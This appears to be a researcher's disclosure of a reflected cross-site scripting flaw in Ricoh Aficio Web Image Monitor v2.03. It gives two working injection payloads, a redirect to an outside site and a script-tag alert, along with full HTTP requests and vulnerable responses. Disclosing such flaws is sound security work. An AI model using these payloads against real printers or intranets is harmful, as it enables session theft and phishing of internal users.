I was poking at some Ricoh MFPs several days ago, when I found this. It is
nothing to get to terribly excited about as it's just a reflected XSS.
However, the ability to abuse any trusted internal IP should be considered a
threat. Companies have taken big hits from less. So without further ado,
here are the petty little details:


Tested successfully on numerous different Ricoh Aficio models, all running
v2.03 of the Web Image Monitor interface. Responses included below are html
encoded for your protection.

Fun with Redirects:

My inital test was just an abuse of the redirect functionality that is being
exploited for the vector.

GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1


HTTP/1.0 200 OK

Date: Tue, 09 Nov 2010 17:58:00 GMT

Server: Web-Server/3.0

Content-Type: text/html; charset=UTF-8

Content-Length: 683

Expires: Tue, 09 Nov 2010 17:58:00 GMT

Pragma: no-cache

Cache-Control: no-cache

Set-Cookie: cookieOnOffChecker=on; path=/

Connection: close


<html><head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta http-equiv="refresh" content="1;
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">

<meta http-equiv="Cache-Control" content="no-cache">

<meta http-equiv="Pragma" content="no-cache">

<meta http-equiv="Expires" content="-1">

<title>Web Image Monitor</title>

<script language="javascript">

<!--

function jumpPage(){

self.document.cookie="cookieOnOffChecker=on; path=/";

location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="
http://cosine-security.blogspot.com";

}

// -->

</script>

</head>

<body onLoad="jumpPage()"></body>

</html>



A more traditional XSS test will still work just as well of course:


Traditional Test:

GET /?--></script><script>alert(51494)</script>
HTTP/1.1



HTTP/1.0 200 OK

Date: Fri, 29 Oct 2010 17:43:19 GMT

Server: Web-Server/3.0

Content-Type: text/html; charset=UTF-8

Content-Length: 672

Expires: Fri, 29 Oct 2010 17:43:19 GMT

Pragma: no-cache

Cache-Control: no-cache

Set-Cookie: cookieOnOffChecker=on; path=/

Connection: close


<html><head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta http-equiv="refresh" content="1;
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">

<meta http-equiv="Cache-Control" content="no-cache">

<meta http-equiv="Pragma" content="no-cache">

<meta http-equiv="Expires" content="-1">

<title>Web Image Monitor</title>

<script language="javascript">

<!--

function jumpPage(){

self.document.cookie="cookieOnOffChecker=on; path=/";

location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";

}

// -->

</script>

</head>

<body onLoad="jumpPage()"></body>


The same writeup, including a screenshot, can be found at
http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html